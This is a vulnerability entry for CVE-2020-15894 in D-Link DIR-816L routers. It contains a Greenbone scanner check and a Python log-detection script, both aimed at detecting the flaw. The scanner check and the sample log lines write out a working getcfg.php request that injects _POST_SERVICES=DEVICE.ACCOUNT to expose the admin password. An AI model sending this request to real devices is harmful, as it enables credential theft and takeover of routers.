CVSS2: 5 Medium (AV:N/AC:L/Au:N/C:P/I:N/A:N)
Attack Vector: NETWORK; Attack Complexity: LOW; Authentication: NONE; Confidentiality Impact: PARTIAL; Integrity Impact: NONE; Availability Impact: NONE

CVSS3: 7.5 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
Attack Vector: NETWORK; Attack Complexity: LOW; Privileges Required: NONE; User Interaction: NONE; Scope: UNCHANGED; Confidentiality Impact: HIGH; Integrity Impact: NONE; Availability Impact: NONE

AI Score: 9.4 High (Confidence: High)
EPSS: 0.002 Low (Percentile: 53.6%)

The D-Link DIR-816L is prone to an information disclosure
vulnerability.
# SPDX-FileCopyrightText: 2020 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-or-later

CPE_PREFIX = "cpe:/o:dlink";

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.144342");
  script_version("2023-11-21T05:05:52+0000");
  script_tag(name:"last_modification", value:"2023-11-21 05:05:52 +0000 (Tue, 21 Nov 2023)");
  script_tag(name:"creation_date", value:"2020-08-03 09:07:05 +0000 (Mon, 03 Aug 2020)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");

  script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2020-07-24 19:13:00 +0000 (Fri, 24 Jul 2020)");

  script_cve_id("CVE-2020-15894");

  script_tag(name:"qod_type", value:"exploit");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("D-Link DIR-816L Information Disclosure Vulnerability (CVE-2020-15894)");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2020 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_dlink_dns_http_detect.nasl", "gb_dlink_dsl_detect.nasl",
                      "gb_dlink_dap_consolidation.nasl", "gb_dlink_dir_consolidation.nasl",
                      "gb_dlink_dwr_detect.nasl");
  script_mandatory_keys("d-link/http/detected"); # nb: Experiences in the past have shown that various different devices might be affected
  script_require_ports("Services/www", 80);

  script_tag(name:"summary", value:"The D-Link DIR-816L is prone to an information disclosure
vulnerability.");

  script_tag(name:"insight", value:"There exists an exposed administration function in getcfg.php,
which can be used to call various services. It can be utilized by an attacker to retrieve various
sensitive information, such as admin login credentials, by setting the value of _POST_SERVICES in
the query string to DEVICE.ACCOUNT.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_tag(name:"affected", value:"D-Link DIR-816L devices. Other D-Link products might be affected
as well.");

  script_tag(name:"solution", value:"See the referenced vendor advisory for a solution.");

  script_xref(name:"URL", value:"https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10169");
  script_xref(name:"URL", value:"https://research.loginsoft.com/vulnerability/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");

if (!infos = get_app_port_from_cpe_prefix(cpe: CPE_PREFIX, service: "www"))
  exit(0);

port = infos["port"];
CPE = infos["cpe"];

if (!dir = get_app_location(cpe: CPE, port: port))
  exit(0);

if (dir == "/")
  dir = "";

url = dir + "/getcfg.php?a=%0A_POST_SERVICES%3DDEVICE.ACCOUNT%0AAUTHORIZED_GROUP%3D1";

if (http_vuln_check(port: port, url: url, pattern: "<password>[^<]+</password>", check_header: TRUE,
                    extra_check: "<service>DEVICE\.ACCOUNT")) {
  report = http_report_vuln_url(port: port, url: url);
  security_message(port: port, data: report);
  exit(0);
}

exit(99);
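
For log review, the following is an added example and not part of the Greenbone script: it flags the request shape the check above sends, a `getcfg.php` query string whose decoded value carries `_POST_SERVICES` or `AUTHORIZED_GROUP` behind an encoded line break. It assumes combined-format access logs from a proxy or sensor in front of the device; the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Request line of a combined-log-format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Keys that appear after a decoded CR/LF inside the query string.
INJECTED_KEY_RE = re.compile(r"[\r\n](_POST_SERVICES|AUTHORIZED_GROUP)=([^\r\n&]*)")


def inspect_line(line):
    """Return a finding dict for a suspicious getcfg.php request, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    parts = urlsplit(match.group("target"))
    if not parts.path.lower().endswith("/getcfg.php"):
        return None
    decoded = unquote(parts.query)  # %0A / %0a -> "\n", %3D / %3d -> "="
    injected = dict(INJECTED_KEY_RE.findall(decoded))
    if not injected:
        return None
    return {
        "client": line.split(" ", 1)[0],
        "service": injected.get("_POST_SERVICES"),
        "forced_group": injected.get("AUTHORIZED_GROUP"),
    }


def scan(lines):
    """Collect findings for every matching line."""
    return [f for f in map(inspect_line, lines) if f is not None]


# Constructed sample lines (documentation address ranges, not captured traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Aug/2020:09:07:05 +0000] "GET /getcfg.php?a=%0A_POST_SERVICES'
    '%3DDEVICE.ACCOUNT%0AAUTHORIZED_GROUP%3D1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [03/Aug/2020:09:08:11 +0000] "GET /getcfg.php?a=%0a_POST_SERVICES'
    '%3dDEVICE.ACCOUNT HTTP/1.1" 200 498',
    '192.0.2.10 - - [03/Aug/2020:09:09:40 +0000] "GET /getcfg.php?a=1 HTTP/1.1" 200 87',
    '192.0.2.10 - - [03/Aug/2020:09:09:41 +0000] "GET /index.php HTTP/1.1" 200 1043',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Matching on the decoded query rather than the raw string catches both upper- and lower-case percent-encoding of the line break.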